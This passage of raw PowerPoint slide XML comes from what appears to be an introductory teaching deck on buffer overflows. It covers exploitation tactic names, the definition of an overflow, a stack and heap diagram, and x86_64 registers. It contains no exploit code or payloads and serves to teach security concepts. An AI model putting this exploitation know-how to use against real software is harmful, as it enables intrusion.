                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Exploitation for </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Privilege Escalation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Exploitation of Remote Services</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1073797673"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884A7709-9B8B-620D-E013-994302E658B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965441" y="1820714"/>
            <a:ext cx="2323323" cy="1389328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109389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What is Buffer Overflow?</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Font typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Buffer overflow condition exists when user can put more data than what was intended in the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Writing data outside of the intended buffer can corrupt data, crash the program, or cause the execution of malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Languages: C, C++, Fortran, Assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194447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How does Stack work in a computer memory?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A48517D-FB52-E063-9532-20FC0E12A103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8374793" y="2244881"/>
            <a:ext cx="28904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push – add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>pop – remove</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FA7908-1058-8896-9C6C-C186479FD7AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368185137"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4636449" y="1667218"/>
          <a:ext cx="3039028" cy="4494701"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3039028">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="173260655"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="752975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a: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65493288"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="752975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>Stack </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3733610802"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="584488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="3200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="958727521"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="584488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>data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65997276"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="752975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>Heap</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="320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4044979320"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="752975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a: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34442632"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E681A57-EA22-1D60-5621-3A88843F4093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8741618" y="4097165"/>
            <a:ext cx="1032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Pop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056D8709-24C7-8635-5577-F6654520EFFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763333" y="2570390"/>
            <a:ext cx="4666" cy="86774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06A409-79CE-4D4F-7226-95B68DD68987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2861035" y="4097871"/>
            <a:ext cx="1032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Push</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Arrow: Curved Down 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EBC029E-E555-2E1B-BF8E-D913751F834A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2314628" y="3667743"/>
            <a:ext cx="2231570" cy="7308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Down 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B71D0C-A150-ED95-DE15-74197096EAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8057725" y="4213265"/>
            <a:ext cx="2231570" cy="6609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188F4D8-403E-C2B5-3862-E40F1796595A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818143" y="1783359"/>
            <a:ext cx="28942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High Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6115AEDC-E0B9-0D96-DE37-DA6A3C56F3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813708" y="5577519"/>
            <a:ext cx="28592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Low Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A4BB70-1A2F-8751-5FB3-EEB2F833F0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6759339" y="4503205"/>
            <a:ext cx="12652" cy="73418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51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Common CPU Registers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>x86_64)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C16902A8-5F6F-6D1D-C0B1-7A7B68CB71E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3637876778"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1506482" y="2005724"/>
          <a:ext cx="3369987" cy="3840480"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{C4B1156A-380E-4F78-BDF5-A606A8083BF9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3369987">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1920136202"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>General Registers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="757494154"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000" b="0" i="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="357913972"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" err="1"/>
                        <a:t>rbx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2230021223"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" err="1"/>
                        <a:t>rcx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2260919964"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" err="1"/>
                        <a:t>rdx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="88571554"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" err="1"/>
                        <a:t>rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1732081477"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" err="1"/>
                        <a:t>rsi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3310971099"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C489FE-4F69-EBD4-50A9-F8B9D09FB78A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="866153370"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5759490" y="2072001"/>
          <a:ext cx="4894852" cy="2651760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{C4B1156A-380E-4F78-BDF5-A606A8083BF9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2447426">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3547640416"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2447426">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4264393342"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="433478">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Special Registers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="139615926"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rbp</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Base pointer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3338769541"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rsp</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Stack pointer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2172269937"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rip</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
